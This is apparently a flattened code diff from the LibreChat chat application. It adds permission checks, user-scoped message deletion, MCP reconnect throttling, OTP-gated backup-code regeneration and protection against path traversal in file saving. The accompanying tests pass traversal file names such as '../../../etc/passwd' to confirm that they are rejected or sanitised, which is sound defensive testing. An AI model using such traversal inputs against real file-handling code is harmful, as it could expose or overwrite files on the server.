router.get('/:serverName/auth-values', requireJwtAuth, async (req, res) => { router.get('/:serverName/auth-values', requireJwtAuth, checkMCPUsePermissions, async (req, res) => {
try { try {
const { serverName } = req.params; const { serverName } = req.params;
const user = req.user; const user = req.user;
@ -662,19 +714,6 @@ async function getOAuthHeaders(serverName, userId) {
MCP Server CRUD Routes (User-Managed MCP Servers) MCP Server CRUD Routes (User-Managed MCP Servers)
*/ */
// Permission checkers for MCP server management
const checkMCPUsePermissions = generateCheckAccess({
permissionType: PermissionTypes.MCP_SERVERS,
permissions: [Permissions.USE],
getRoleByName,
});
const checkMCPCreate = generateCheckAccess({
permissionType: PermissionTypes.MCP_SERVERS,
permissions: [Permissions.USE, Permissions.CREATE],
getRoleByName,
});
/** /**
* Get list of accessible MCP servers * Get list of accessible MCP servers
* @route GET /api/mcp/servers * @route GET /api/mcp/servers

View file

@ -404,8 +404,8 @@ router.put('/:conversationId/:messageId/feedback', validateMessageReq, async (re
router.delete('/:conversationId/:messageId', validateMessageReq, async (req, res) => { router.delete('/:conversationId/:messageId', validateMessageReq, async (req, res) => {
try { try {
const { messageId } = req.params; const { conversationId, messageId } = req.params;
await deleteMessages({ messageId }); await deleteMessages({ messageId, conversationId, user: req.user.id });
res.status(204).send(); res.status(204).send();
} catch (error) { } catch (error) {
logger.error('Error deleting message:', error); logger.error('Error deleting message:', error);

View file

@ -0,0 +1,124 @@
jest.mock('uuid', () => ({ v4: jest.fn(() => 'mock-uuid') }));
jest.mock('@librechat/data-schemas', () => ({
logger: { warn: jest.fn(), debug: jest.fn(), error: jest.fn() },
}));
jest.mock('@librechat/agents', () => ({
getCodeBaseURL: jest.fn(() => 'http://localhost:8000'),
}));
const mockSanitizeFilename = jest.fn();
jest.mock('@librechat/api', () => ({
logAxiosError: jest.fn(),
getBasePath: jest.fn(() => ''),
sanitizeFilename: mockSanitizeFilename,
}));
jest.mock('librechat-data-provider', () => ({
...jest.requireActual('librechat-data-provider'),
mergeFileConfig: jest.fn(() => ({ serverFileSizeLimit: 100 * 1024 * 1024 })),
getEndpointFileConfig: jest.fn(() => ({
fileSizeLimit: 100 * 1024 * 1024,
supportedMimeTypes: ['*/*'],
})),
fileConfig: { checkType: jest.fn(() => true) },
}));
jest.mock('~/models', () => ({
createFile: jest.fn().mockResolvedValue({}),
getFiles: jest.fn().mockResolvedValue([]),
updateFile: jest.fn(),
claimCodeFile: jest.fn().mockResolvedValue({ file_id: 'mock-uuid', usage: 0 }),
}));
const mockSaveBuffer = jest.fn().mockResolvedValue('/uploads/user123/mock-uuid__output.csv');
jest.mock('~/server/services/Files/strategies', () => ({
getStrategyFunctions: jest.fn(() => ({
saveBuffer: mockSaveBuffer,
})),
}));
jest.mock('~/server/services/Files/permissions', () => ({
filterFilesByAgentAccess: jest.fn().mockResolvedValue([]),
}));
jest.mock('~/server/services/Files/images/convert', () => ({
convertImage: jest.fn(),
}));
jest.mock('~/server/utils', () => ({
determineFileType: jest.fn().mockResolvedValue({ mime: 'text/csv' }),
}));
jest.mock('axios', () =>
jest.fn().mockResolvedValue({
data: Buffer.from('file-content'),
}),
);
const { createFile } = require('~/models');
const { processCodeOutput } = require('../process');
const baseParams = {
req: {
user: { id: 'user123' },
config: {
fileStrategy: 'local',
imageOutputType: 'webp',
fileConfig: {},
},
},
id: 'code-file-id',
apiKey: 'test-key',
toolCallId: 'tool-1',
conversationId: 'conv-1',
messageId: 'msg-1',
session_id: 'session-1',
};
describe('processCodeOutput path traversal protection', () => {
beforeEach(() => {
jest.clearAllMocks();
});
test('sanitizeFilename is called with the raw artifact name', async () => {
mockSanitizeFilename.mockReturnValueOnce('output.csv');
await processCodeOutput({ ...baseParams, name: 'output.csv' });
expect(mockSanitizeFilename).toHaveBeenCalledWith('output.csv');
});
test('sanitized name is used in saveBuffer fileName', async () => {
mockSanitizeFilename.mockReturnValueOnce('sanitized-name.txt');
await processCodeOutput({ ...baseParams, name: '../../../tmp/poc.txt' });
expect(mockSanitizeFilename).toHaveBeenCalledWith('../../../tmp/poc.txt');
const call = mockSaveBuffer.mock.calls[0][0];
expect(call.fileName).toBe('mock-uuid__sanitized-name.txt');
});
test('sanitized name is stored as filename in the file record', async () => {
mockSanitizeFilename.mockReturnValueOnce('safe-output.csv');
await processCodeOutput({ ...baseParams, name: 'unsafe/../../output.csv' });
const fileArg = createFile.mock.calls[0][0];
expect(fileArg.filename).toBe('safe-output.csv');
});
test('sanitized name is used for image file records', async () => {
const { convertImage } = require('~/server/services/Files/images/convert');
convertImage.mockResolvedValueOnce({
filepath: '/images/user123/mock-uuid.webp',
bytes: 100,
});
mockSanitizeFilename.mockReturnValueOnce('safe-chart.png');
await processCodeOutput({ ...baseParams, name: '../../../chart.png' });
expect(mockSanitizeFilename).toHaveBeenCalledWith('../../../chart.png');
const fileArg = createFile.mock.calls[0][0];
expect(fileArg.filename).toBe('safe-chart.png');
});
});

View file

@ -3,7 +3,7 @@ const { v4 } = require('uuid');
const axios = require('axios'); const axios = require('axios');
const { logger } = require('@librechat/data-schemas'); const { logger } = require('@librechat/data-schemas');
const { getCodeBaseURL } = require('@librechat/agents'); const { getCodeBaseURL } = require('@librechat/agents');
const { logAxiosError, getBasePath } = require('@librechat/api'); const { logAxiosError, getBasePath, sanitizeFilename } = require('@librechat/api');
const { const {
Tools, Tools,
megabyte, megabyte,
@ -146,6 +146,13 @@ const processCodeOutput = async ({
); );
} }
const safeName = sanitizeFilename(name);
if (safeName !== name) {
logger.warn(
`[processCodeOutput] Filename sanitized: "${name}" -> "${safeName}" | conv=${conversationId}`,
);
}
if (isImage) { if (isImage) {
const usage = isUpdate ? (claimed.usage ?? 0) + 1 : 1; const usage = isUpdate ? (claimed.usage ?? 0) + 1 : 1;
const _file = await convertImage(req, buffer, 'high', `${file_id}${fileExt}`); const _file = await convertImage(req, buffer, 'high', `${file_id}${fileExt}`);
@ -156,7 +163,7 @@ const processCodeOutput = async ({
file_id, file_id,
messageId, messageId,
usage, usage,
filename: name, filename: safeName,
conversationId, conversationId,
user: req.user.id, user: req.user.id,
type: `image/${appConfig.imageOutputType}`, type: `image/${appConfig.imageOutputType}`,
@ -200,7 +207,7 @@ const processCodeOutput = async ({
); );
} }
const fileName = `${file_id}__${name}`; const fileName = `${file_id}__${safeName}`;
const filepath = await saveBuffer({ const filepath = await saveBuffer({
userId: req.user.id, userId: req.user.id,
buffer, buffer,
@ -213,7 +220,7 @@ const processCodeOutput = async ({
filepath, filepath,
messageId, messageId,
object: 'file', object: 'file',
filename: name, filename: safeName,
type: mimeType, type: mimeType,
conversationId, conversationId,
user: req.user.id, user: req.user.id,
@ -229,6 +236,11 @@ const processCodeOutput = async ({
await createFile(file, true); await createFile(file, true);
return Object.assign(file, { messageId, toolCallId }); return Object.assign(file, { messageId, toolCallId });
} catch (error) { } catch (error) {
if (error?.message === 'Path traversal detected in filename') {
logger.warn(
`[processCodeOutput] Path traversal blocked for file "${name}" | conv=${conversationId}`,
);
}
logAxiosError({ logAxiosError({
message: 'Error downloading/processing code environment file', message: 'Error downloading/processing code environment file',
error, error,

View file

@ -58,6 +58,7 @@ jest.mock('@librechat/agents', () => ({
jest.mock('@librechat/api', () => ({ jest.mock('@librechat/api', () => ({
logAxiosError: jest.fn(), logAxiosError: jest.fn(),
getBasePath: jest.fn(() => ''), getBasePath: jest.fn(() => ''),
sanitizeFilename: jest.fn((name) => name),
})); }));
// Mock models // Mock models

View file

@ -0,0 +1,69 @@
jest.mock('@librechat/api', () => ({ deleteRagFile: jest.fn() }));
jest.mock('@librechat/data-schemas', () => ({
logger: { warn: jest.fn(), error: jest.fn() },
}));
const mockTmpBase = require('fs').mkdtempSync(
require('path').join(require('os').tmpdir(), 'crud-traversal-'),
);
jest.mock('~/config/paths', () => {
const path = require('path');
return {
publicPath: path.join(mockTmpBase, 'public'),
uploads: path.join(mockTmpBase, 'uploads'),
};
});
const fs = require('fs');
const path = require('path');
const { saveLocalBuffer } = require('../crud');
describe('saveLocalBuffer path containment', () => {
beforeAll(() => {
fs.mkdirSync(path.join(mockTmpBase, 'public', 'images'), { recursive: true });
fs.mkdirSync(path.join(mockTmpBase, 'uploads'), { recursive: true });
});
afterAll(() => {
fs.rmSync(mockTmpBase, { recursive: true, force: true });
});
test('rejects filenames with path traversal sequences', async () => {
await expect(
saveLocalBuffer({
userId: 'user1',
buffer: Buffer.from('malicious'),
fileName: '../../../etc/passwd',
basePath: 'uploads',
}),
).rejects.toThrow('Path traversal detected in filename');
});
test('rejects prefix-collision traversal (startsWith bypass)', async () => {
fs.mkdirSync(path.join(mockTmpBase, 'uploads', 'user10'), { recursive: true });
await expect(
saveLocalBuffer({
userId: 'user1',
buffer: Buffer.from('malicious'),
fileName: '../user10/evil',
basePath: 'uploads',
}),
).rejects.toThrow('Path traversal detected in filename');
});
test('allows normal filenames', async () => {
const result = await saveLocalBuffer({
userId: 'user1',
buffer: Buffer.from('safe content'),
fileName: 'file-id__output.csv',
basePath: 'uploads',
});
expect(result).toBe('/uploads/user1/file-id__output.csv');
const filePath = path.join(mockTmpBase, 'uploads', 'user1', 'file-id__output.csv');
expect(fs.existsSync(filePath)).toBe(true);
fs.unlinkSync(filePath);
});
});

View file

@ -78,7 +78,13 @@ async function saveLocalBuffer({ userId, buffer, fileName, basePath = 'images' }
fs.mkdirSync(directoryPath, { recursive: true }); fs.mkdirSync(directoryPath, { recursive: true });
} }
fs.writeFileSync(path.join(directoryPath, fileName), buffer); const resolvedDir = path.resolve(directoryPath);
const resolvedPath = path.resolve(resolvedDir, fileName);
const rel = path.relative(resolvedDir, resolvedPath);
if (rel.startsWith('..') || path.isAbsolute(rel) || rel.includes(`..${path.sep}`)) {
throw new Error('Path traversal detected in filename');
}
fs.writeFileSync(resolvedPath, buffer);
const filePath = path.posix.join('/', basePath, userId, fileName); const filePath = path.posix.join('/', basePath, userId, fileName);
@ -165,9 +171,8 @@ async function getLocalFileURL({ fileName, basePath = 'images' }) {
} }
/** /**
* Validates if a given filepath is within a specified subdirectory under a base path. This function constructs * Validates that a filepath is strictly contained within a subdirectory under a base path,
* the expected base path using the base, subfolder, and user id from the request, and then checks if the * using path.relative to prevent prefix-collision bypasses.
* provided filepath starts with this constructed base path.
* *
* @param {ServerRequest} req - The request object from Express. It should contain a `user` property with an `id`. * @param {ServerRequest} req - The request object from Express. It should contain a `user` property with an `id`.
* @param {string} base - The base directory path. * @param {string} base - The base directory path.
@ -180,7 +185,8 @@ async function getLocalFileURL({ fileName, basePath = 'images' }) {
const isValidPath = (req, base, subfolder, filepath) => { const isValidPath = (req, base, subfolder, filepath) => {
const normalizedBase = path.resolve(base, subfolder, req.user.id); const normalizedBase = path.resolve(base, subfolder, req.user.id);
const normalizedFilepath = path.resolve(filepath); const normalizedFilepath = path.resolve(filepath);
return normalizedFilepath.startsWith(normalizedBase); const rel = path.relative(normalizedBase, normalizedFilepath);
return !rel.startsWith('..') && !path.isAbsolute(rel) && !rel.includes(`..${path.sep}`);
}; };
/** /**

View file

@ -34,6 +34,55 @@ const { reinitMCPServer } = require('./Tools/mcp');
const { getAppConfig } = require('./Config'); const { getAppConfig } = require('./Config');
const { getLogStores } = require('~/cache'); const { getLogStores } = require('~/cache');
const MAX_CACHE_SIZE = 1000;
const lastReconnectAttempts = new Map();
const RECONNECT_THROTTLE_MS = 10_000;
const missingToolCache = new Map();
const MISSING_TOOL_TTL_MS = 10_000;
function evictStale(map, ttl) {
if (map.size <= MAX_CACHE_SIZE) {
return;
}
const now = Date.now();
for (const [key, timestamp] of map) {
if (now - timestamp >= ttl) {
map.delete(key);
}
if (map.size <= MAX_CACHE_SIZE) {
return;
}
}
}
const unavailableMsg =
"This tool's MCP server is temporarily unavailable. Please try again shortly.";
/**
* @param {string} toolName
* @param {string} serverName
*/
function createUnavailableToolStub(toolName, serverName) {
const normalizedToolKey = `${toolName}${Constants.mcp_delimiter}${normalizeServerName(serverName)}`;
const _call = async () => [unavailableMsg, null];
const toolInstance = tool(_call, {
schema: {
type: 'object',
properties: {
input: { type: 'string', description: 'Input for the tool' },
},
required: [],
},
name: normalizedToolKey,
description: unavailableMsg,
responseFormat: AgentConstants.CONTENT_AND_ARTIFACT,
});
toolInstance.mcp = true;
toolInstance.mcpRawServerName = serverName;
return toolInstance;
}
function isEmptyObjectSchema(jsonSchema) { function isEmptyObjectSchema(jsonSchema) {
return ( return (
jsonSchema != null && jsonSchema != null &&
@ -211,6 +260,17 @@ async function reconnectServer({
logger.debug( logger.debug(
`[MCP][reconnectServer] serverName: ${serverName}, user: ${user?.id}, hasUserMCPAuthMap: ${!!userMCPAuthMap}`, `[MCP][reconnectServer] serverName: ${serverName}, user: ${user?.id}, hasUserMCPAuthMap: ${!!userMCPAuthMap}`,
); );
const throttleKey = `${user.id}:${serverName}`;
const now = Date.now();
const lastAttempt = lastReconnectAttempts.get(throttleKey) ?? 0;
if (now - lastAttempt < RECONNECT_THROTTLE_MS) {
logger.debug(`[MCP][reconnectServer] Throttled reconnect for ${serverName}`);
return null;
}
lastReconnectAttempts.set(throttleKey, now);
evictStale(lastReconnectAttempts, RECONNECT_THROTTLE_MS);
const runId = Constants.USE_PRELIM_RESPONSE_MESSAGE_ID; const runId = Constants.USE_PRELIM_RESPONSE_MESSAGE_ID;
const flowId = `${user.id}:${serverName}:${Date.now()}`; const flowId = `${user.id}:${serverName}:${Date.now()}`;
const flowManager = getFlowStateManager(getLogStores(CacheKeys.FLOWS)); const flowManager = getFlowStateManager(getLogStores(CacheKeys.FLOWS));
@ -267,7 +327,7 @@ async function reconnectServer({
userMCPAuthMap, userMCPAuthMap,
forceNew: true, forceNew: true,
returnOnOAuth: false, returnOnOAuth: false,
connectionTimeout: Time.TWO_MINUTES, connectionTimeout: Time.THIRTY_SECONDS,
}); });
} finally { } finally {
// Clean up abort handler to prevent memory leaks // Clean up abort handler to prevent memory leaks
@ -330,9 +390,13 @@ async function createMCPTools({
userMCPAuthMap, userMCPAuthMap,
streamId, streamId,
}); });
if (result === null) {
logger.debug(`[MCP][${serverName}] Reconnect throttled, skipping tool creation.`);
return [];
}
if (!result || !result.tools) { if (!result || !result.tools) {
logger.warn(`[MCP][${serverName}] Failed to reinitialize MCP server.`); logger.warn(`[MCP][${serverName}] Failed to reinitialize MCP server.`);
return; return [];
} }
const serverTools = []; const serverTools = [];
@ -402,6 +466,14 @@ async function createMCPTool({
/** @type {LCTool | undefined} */ /** @type {LCTool | undefined} */
let toolDefinition = availableTools?.[toolKey]?.function; let toolDefinition = availableTools?.[toolKey]?.function;
if (!toolDefinition) { if (!toolDefinition) {
const cachedAt = missingToolCache.get(toolKey);
if (cachedAt && Date.now() - cachedAt < MISSING_TOOL_TTL_MS) {
logger.debug(
`[MCP][${serverName}][${toolName}] Tool in negative cache, returning unavailable stub.`,
);
return createUnavailableToolStub(toolName, serverName);
}
logger.warn( logger.warn(
`[MCP][${serverName}][${toolName}] Requested tool not found in available tools, re-initializing MCP server.`, `[MCP][${serverName}][${toolName}] Requested tool not found in available tools, re-initializing MCP server.`,
); );
@ -415,11 +487,18 @@ async function createMCPTool({
streamId, streamId,
}); });
toolDefinition = result?.availableTools?.[toolKey]?.function; toolDefinition = result?.availableTools?.[toolKey]?.function;
if (!toolDefinition) {
missingToolCache.set(toolKey, Date.now());
evictStale(missingToolCache, MISSING_TOOL_TTL_MS);
}
} }
if (!toolDefinition) { if (!toolDefinition) {
logger.warn(`[MCP][${serverName}][${toolName}] Tool definition not found, cannot create tool.`); logger.warn(
return; `[MCP][${serverName}][${toolName}] Tool definition not found, returning unavailable stub.`,
);
return createUnavailableToolStub(toolName, serverName);
} }
return createToolInstance({ return createToolInstance({
@ -720,4 +799,5 @@ module.exports = {
getMCPSetupData, getMCPSetupData,
checkOAuthFlowStatus, checkOAuthFlowStatus,
getServerConnectionStatus, getServerConnectionStatus,
createUnavailableToolStub,
}; };

View file

@ -45,6 +45,7 @@ const {
getMCPSetupData, getMCPSetupData,
checkOAuthFlowStatus, checkOAuthFlowStatus,
getServerConnectionStatus, getServerConnectionStatus,
createUnavailableToolStub,
} = require('./MCP'); } = require('./MCP');
jest.mock('./Config', () => ({ jest.mock('./Config', () => ({
@ -1098,6 +1099,188 @@ describe('User parameter passing tests', () => {
}); });
}); });
describe('createUnavailableToolStub', () => {
it('should return a tool whose _call returns a valid CONTENT_AND_ARTIFACT two-tuple', async () => {
const stub = createUnavailableToolStub('myTool', 'myServer');
// invoke() goes through langchain's base tool, which checks responseFormat.
// CONTENT_AND_ARTIFACT requires [content, artifact] — a bare string would throw:
// "Tool response format is "content_and_artifact" but the output was not a two-tuple"
const result = await stub.invoke({});
// If we reach here without throwing, the two-tuple format is correct.
// invoke() returns the content portion of [content, artifact] as a string.
expect(result).toContain('temporarily unavailable');
});
});
describe('negative tool cache and throttle interaction', () => {
it('should cache tool as missing even when throttled (cross-user dedup)', async () => {
const mockUser = { id: 'throttle-test-user' };
const mockRes = { write: jest.fn(), flush: jest.fn() };
// First call: reconnect succeeds but tool not found
mockReinitMCPServer.mockResolvedValueOnce({
availableTools: {},
});
await createMCPTool({
res: mockRes,
user: mockUser,
toolKey: `missing-tool${D}cache-dedup-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
// Second call within 10s for DIFFERENT tool on same server:
// reconnect is throttled (returns null), tool is still cached as missing.
// This is intentional: the cache acts as cross-user dedup since the
// throttle is per-user-per-server and can't prevent N different users
// from each triggering their own reconnect.
const result2 = await createMCPTool({
res: mockRes,
user: mockUser,
toolKey: `other-tool${D}cache-dedup-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
expect(result2).toBeDefined();
expect(result2.name).toContain('other-tool');
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
});
it('should prevent user B from triggering reconnect when user A already cached the tool', async () => {
const userA = { id: 'cache-user-A' };
const userB = { id: 'cache-user-B' };
const mockRes = { write: jest.fn(), flush: jest.fn() };
// User A: real reconnect, tool not found → cached
mockReinitMCPServer.mockResolvedValueOnce({
availableTools: {},
});
await createMCPTool({
res: mockRes,
user: userA,
toolKey: `shared-tool${D}cross-user-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
// User B requests the SAME tool within 10s.
// The negative cache is keyed by toolKey (no user prefix), so user B
// gets a cache hit and no reconnect fires. This is the cross-user
// storm protection: without this, user B's unthrottled first request
// would trigger a second reconnect to the same server.
const result = await createMCPTool({
res: mockRes,
user: userB,
toolKey: `shared-tool${D}cross-user-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
expect(result).toBeDefined();
expect(result.name).toContain('shared-tool');
// reinitMCPServer still called only once — user B hit the cache
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
});
it('should prevent user B from triggering reconnect for throttle-cached tools', async () => {
const userA = { id: 'storm-user-A' };
const userB = { id: 'storm-user-B' };
const mockRes = { write: jest.fn(), flush: jest.fn() };
// User A: real reconnect for tool-1, tool not found → cached
mockReinitMCPServer.mockResolvedValueOnce({
availableTools: {},
});
await createMCPTool({
res: mockRes,
user: userA,
toolKey: `tool-1${D}storm-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
// User A: tool-2 on same server within 10s → throttled → cached from throttle
await createMCPTool({
res: mockRes,
user: userA,
toolKey: `tool-2${D}storm-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
// User B requests tool-2 — gets cache hit from the throttle-cached entry.
// Without this caching, user B would trigger a real reconnect since
// user B has their own throttle key and hasn't reconnected yet.
const result = await createMCPTool({
res: mockRes,
user: userB,
toolKey: `tool-2${D}storm-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
expect(result).toBeDefined();
expect(result.name).toContain('tool-2');
// Still only 1 real reconnect — user B was protected by the cache
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
});
});
describe('createMCPTools throttle handling', () => {
it('should return empty array with debug log when reconnect is throttled', async () => {
const mockUser = { id: 'throttle-tools-user' };
const mockRes = { write: jest.fn(), flush: jest.fn() };
// First call: real reconnect
mockReinitMCPServer.mockResolvedValueOnce({
tools: [{ name: 'tool1' }],
availableTools: {
[`tool1${D}throttle-tools-server`]: {
function: { description: 'Tool 1', parameters: {} },
},
},
});
await createMCPTools({
res: mockRes,
user: mockUser,
serverName: 'throttle-tools-server',
provider: 'openai',
userMCPAuthMap: {},
});
// Second call within 10s — throttled
const result = await createMCPTools({
res: mockRes,
user: mockUser,
serverName: 'throttle-tools-server',
provider: 'openai',
userMCPAuthMap: {},
});
expect(result).toEqual([]);
// reinitMCPServer called only once — second was throttled
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
// Should log at debug level (not warn) for throttled case
expect(logger.debug).toHaveBeenCalledWith(expect.stringContaining('Reconnect throttled'));
});
});
describe('User parameter integrity', () => { describe('User parameter integrity', () => {
it('should preserve user object properties through the call chain', async () => { it('should preserve user object properties through the call chain', async () => {
const complexUser = { const complexUser = {

View file

@ -153,9 +153,11 @@ const generateBackupCodes = async (count = 10) => {
* @param {Object} params * @param {Object} params
* @param {Object} params.user * @param {Object} params.user
* @param {string} params.backupCode * @param {string} params.backupCode
* @param {boolean} [params.persist=true] - Whether to persist the used-mark to the database.
* Pass `false` when the caller will immediately overwrite `backupCodes` (e.g. re-enrollment).
* @returns {Promise<boolean>} * @returns {Promise<boolean>}
*/ */
const verifyBackupCode = async ({ user, backupCode }) => { const verifyBackupCode = async ({ user, backupCode, persist = true }) => {
if (!backupCode || !user || !Array.isArray(user.backupCodes)) { if (!backupCode || !user || !Array.isArray(user.backupCodes)) {
return false; return false;
} }
@ -165,17 +167,50 @@ const verifyBackupCode = async ({ user, backupCode }) => {
(codeObj) => codeObj.codeHash === hashedInput && !codeObj.used, (codeObj) => codeObj.codeHash === hashedInput && !codeObj.used,
); );
if (matchingCode) { if (!matchingCode) {
return false;
}
if (persist) {
const updatedBackupCodes = user.backupCodes.map((codeObj) => const updatedBackupCodes = user.backupCodes.map((codeObj) =>
codeObj.codeHash === hashedInput && !codeObj.used codeObj.codeHash === hashedInput && !codeObj.used
? { ...codeObj, used: true, usedAt: new Date() } ? { ...codeObj, used: true, usedAt: new Date() }
: codeObj, : codeObj,
); );
// Update the user record with the marked backup code.
await updateUser(user._id, { backupCodes: updatedBackupCodes }); await updateUser(user._id, { backupCodes: updatedBackupCodes });
return true;
} }
return false; return true;
};
/**
* Verifies a user's identity via TOTP token or backup code.
* @param {Object} params
* @param {Object} params.user - The user document (must include totpSecret and backupCodes).
* @param {string} [params.token] - A 6-digit TOTP token.
* @param {string} [params.backupCode] - An 8-character backup code.
* @param {boolean} [params.persistBackupUse=true] - Whether to mark the backup code as used in the DB.
* @returns {Promise<{ verified: boolean, status?: number, message?: string }>}
*/
const verifyOTPOrBackupCode = async ({ user, token, backupCode, persistBackupUse = true }) => {
if (!token && !backupCode) {
return { verified: false, status: 400 };
}
if (token) {
const secret = await getTOTPSecret(user.totpSecret);
if (!secret) {
return { verified: false, status: 400, message: '2FA secret is missing or corrupted' };
}
const ok = await verifyTOTP(secret, token);
return ok
? { verified: true }
: { verified: false, status: 401, message: 'Invalid token or backup code' };
}
const ok = await verifyBackupCode({ user, backupCode, persist: persistBackupUse });
return ok
? { verified: true }
: { verified: false, status: 401, message: 'Invalid token or backup code' };
}; };
/** /**
@ -213,11 +248,12 @@ const generate2FATempToken = (userId) => {
}; };
module.exports = { module.exports = {
generateTOTPSecret, verifyOTPOrBackupCode,
generateTOTP, generate2FATempToken,
verifyTOTP,
generateBackupCodes, generateBackupCodes,
generateTOTPSecret,
verifyBackupCode, verifyBackupCode,
getTOTPSecret, getTOTPSecret,
generate2FATempToken, generateTOTP,
verifyTOTP,
}; };

View file

@ -358,16 +358,15 @@ function splitAtTargetLevel(messages, targetMessageId) {
* @param {object} params - The parameters for duplicating the conversation. * @param {object} params - The parameters for duplicating the conversation.
* @param {string} params.userId - The ID of the user duplicating the conversation. * @param {string} params.userId - The ID of the user duplicating the conversation.
* @param {string} params.conversationId - The ID of the conversation to duplicate. * @param {string} params.conversationId - The ID of the conversation to duplicate.
* @param {string} [params.title] - Optional title override for the duplicate.
* @returns {Promise<{ conversation: TConversation, messages: TMessage[] }>} The duplicated conversation and messages. * @returns {Promise<{ conversation: TConversation, messages: TMessage[] }>} The duplicated conversation and messages.
*/ */
async function duplicateConversation({ userId, conversationId }) { async function duplicateConversation({ userId, conversationId, title }) {
// Get original conversation
const originalConvo = await getConvo(userId, conversationId); const originalConvo = await getConvo(userId, conversationId);
if (!originalConvo) { if (!originalConvo) {
throw new Error('Conversation not found'); throw new Error('Conversation not found');
} }
// Get original messages
const originalMessages = await getMessages({ const originalMessages = await getMessages({
user: userId, user: userId,
conversationId, conversationId,
@ -383,14 +382,11 @@ async function duplicateConversation({ userId, conversationId }) {
cloneMessagesWithTimestamps(messagesToClone, importBatchBuilder); cloneMessagesWithTimestamps(messagesToClone, importBatchBuilder);
const result = importBatchBuilder.finishConversation( const duplicateTitle = title || originalConvo.title;
originalConvo.title, const result = importBatchBuilder.finishConversation(duplicateTitle, new Date(), originalConvo);
new Date(),
originalConvo,
);
await importBatchBuilder.saveBatch(); await importBatchBuilder.saveBatch();
logger.debug( logger.debug(
`user: ${userId} | New conversation "${originalConvo.title}" duplicated from conversation ID ${conversationId}`, `user: ${userId} | New conversation "${duplicateTitle}" duplicated from conversation ID ${conversationId}`,
); );
const conversation = await getConvo(userId, result.conversation.conversationId); const conversation = await getConvo(userId, result.conversation.conversationId);

View file

@ -1,7 +1,10 @@
const fs = require('fs').promises; const fs = require('fs').promises;
const { resolveImportMaxFileSize } = require('@librechat/api');
const { logger } = require('@librechat/data-schemas'); const { logger } = require('@librechat/data-schemas');
const { getImporter } = require('./importers'); const { getImporter } = require('./importers');
const maxFileSize = resolveImportMaxFileSize();
/** /**
* Job definition for importing a conversation. * Job definition for importing a conversation.
* @param {{ filepath, requestUserId }} job - The job object. * @param {{ filepath, requestUserId }} job - The job object.
@ -11,11 +14,10 @@ const importConversations = async (job) => {
try { try {
logger.debug(`user: ${requestUserId} | Importing conversation(s) from file...`); logger.debug(`user: ${requestUserId} | Importing conversation(s) from file...`);
/* error if file is too large */
const fileInfo = await fs.stat(filepath); const fileInfo = await fs.stat(filepath);
if (fileInfo.size > process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES) { if (fileInfo.size > maxFileSize) {
throw new Error( throw new Error(
`File size is ${fileInfo.size} bytes. It exceeds the maximum limit of ${process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES} bytes.`, `File size is ${fileInfo.size} bytes. It exceeds the maximum limit of ${maxFileSize} bytes.`,
); );
} }

View file

@ -1,5 +1,4 @@
// --- Mocks --- // --- Mocks ---
jest.mock('tiktoken');
jest.mock('fs'); jest.mock('fs');
jest.mock('path'); jest.mock('path');
jest.mock('node-fetch'); jest.mock('node-fetch');

View file

@ -1,12 +1,23 @@
import React, { useState } from 'react'; import React, { useState } from 'react';
import { RefreshCcw } from 'lucide-react'; import { RefreshCcw } from 'lucide-react';
import { useSetRecoilState } from 'recoil';
import { motion, AnimatePresence } from 'framer-motion'; import { motion, AnimatePresence } from 'framer-motion';
import { TBackupCode, TRegenerateBackupCodesResponse, type TUser } from 'librechat-data-provider'; import { REGEXP_ONLY_DIGITS, REGEXP_ONLY_DIGITS_AND_CHARS } from 'input-otp';
import type {
TRegenerateBackupCodesResponse,
TRegenerateBackupCodesRequest,
TBackupCode,
TUser,
} from 'librechat-data-provider';
import { import {
OGDialog, InputOTPSeparator,
InputOTPGroup,
InputOTPSlot,
OGDialogContent, OGDialogContent,
OGDialogTitle, OGDialogTitle,
OGDialogTrigger, OGDialogTrigger,
OGDialog,
InputOTP,
Button, Button,
Label, Label,
Spinner, Spinner,
@ -15,7 +26,6 @@ import {
} from '@librechat/client'; } from '@librechat/client';
import { useRegenerateBackupCodesMutation } from '~/data-provider'; import { useRegenerateBackupCodesMutation } from '~/data-provider';
import { useAuthContext, useLocalize } from '~/hooks'; import { useAuthContext, useLocalize } from '~/hooks';
import { useSetRecoilState } from 'recoil';
import store from '~/store'; import store from '~/store';
const BackupCodesItem: React.FC = () => { const BackupCodesItem: React.FC = () => {
@ -24,25 +34,30 @@ const BackupCodesItem: React.FC = () => {
const { showToast } = useToastContext(); const { showToast } = useToastContext();
const setUser = useSetRecoilState(store.user); const setUser = useSetRecoilState(store.user);
const [isDialogOpen, setDialogOpen] = useState<boolean>(false); const [isDialogOpen, setDialogOpen] = useState<boolean>(false);
const [otpToken, setOtpToken] = useState('');
const [useBackup, setUseBackup] = useState(false);
const { mutate: regenerateBackupCodes, isLoading } = useRegenerateBackupCodesMutation(); const { mutate: regenerateBackupCodes, isLoading } = useRegenerateBackupCodesMutation();
const needs2FA = !!user?.twoFactorEnabled;
const fetchBackupCodes = (auto: boolean = false) => { const fetchBackupCodes = (auto: boolean = false) => {
regenerateBackupCodes(undefined, { let payload: TRegenerateBackupCodesRequest | undefined;
if (needs2FA && otpToken.trim()) {
payload = useBackup ? { backupCode: otpToken.trim() } : { token: otpToken.trim() };
}
regenerateBackupCodes(payload, {
onSuccess: (data: TRegenerateBackupCodesResponse) => { onSuccess: (data: TRegenerateBackupCodesResponse) => {
const newBackupCodes: TBackupCode[] = data.backupCodesHash.map((codeHash) => ({ const newBackupCodes: TBackupCode[] = data.backupCodesHash;
codeHash,
used: false,
usedAt: null,
}));
